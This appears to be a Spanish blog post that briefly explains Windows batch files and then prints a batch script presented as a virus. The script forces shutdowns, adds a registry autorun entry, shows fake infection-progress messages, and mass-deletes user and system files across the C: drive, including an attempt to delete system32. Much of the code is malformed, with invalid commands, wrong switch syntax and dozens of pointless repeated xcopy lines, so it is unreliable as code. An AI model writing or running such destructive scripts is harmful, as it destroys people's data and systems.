Virus en Batch



¿Que son los archivos batch?


Los archivos batch, también conocidos popularmente como archivos BAT, son aplicaciones ejecutables.
Son simplemente pequeños archivo de texto plano, que contienen códigos o instrucciones escritos en el lenguaje de MSDOS, estos códigos son lo que se conoce como comandos.
Estos archivos son guardados con la extensión de archivo .bat o .cmd. Al ejecutarse alguno de ellos (dar dos clics), Windows automáticamente inicia la consola o interprete de comandos de MSDOS y ejecuta las instrucciones o códigos que contienen en grupo, de forma secuencial.




@echo off
shutdown -s -f -t 05 -c by h4x0r-Root >>badcode.exe
Regadd HKLM/software/microsoft/windows/current/version/run/v h4x0r-Root/REG_SZ/d "c:/windows/system32/f">>badcode.exe
CD%windows%SystemRoot%
CD%homepath%
CD windows
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * Infection loading 45%...
start badcode.exe
CD%homepath%
CD Mis Archivos
CD system32
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * Infection 80%..
start badcode.exe
del s/f/q"c:/*.mpg"
del s/f/q"c:/*.vbs"
del s/f/q"c:/*.wmv"
del s/f/q"c:/*.avi"
del s/f/q"c:/*.dll"
del s/f/q"c:/*.txt"
del s/f/q"c:/*.bak"
del s/f/q"c:/*.ico"
del s/f/q"c:/*.ini"
del s/f/q"c:/*.com"
del s/f/q"c:/*.rar"
del s/f/q"c:/*.zip"
del s/f/q"c:/*.docx"
del s/f/q"c:/*.temp"
del s/f/q"c:/*.xps"
del s/f/q"c:/*.tmp"
cd c:/windows
cd c:/windows/system32
del c:/windows/system32
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * infection 90% ...
start badcode.exe
shutdown -s -f -t 01 -c INfection complete 100%>>badcode.exe
Regadd HKLM/software/microsoft/windows/current/version/run/v h4x0r-Root/REG_SZ/d "c:/windows/system32/f">>badcode.exe
start badcode.exe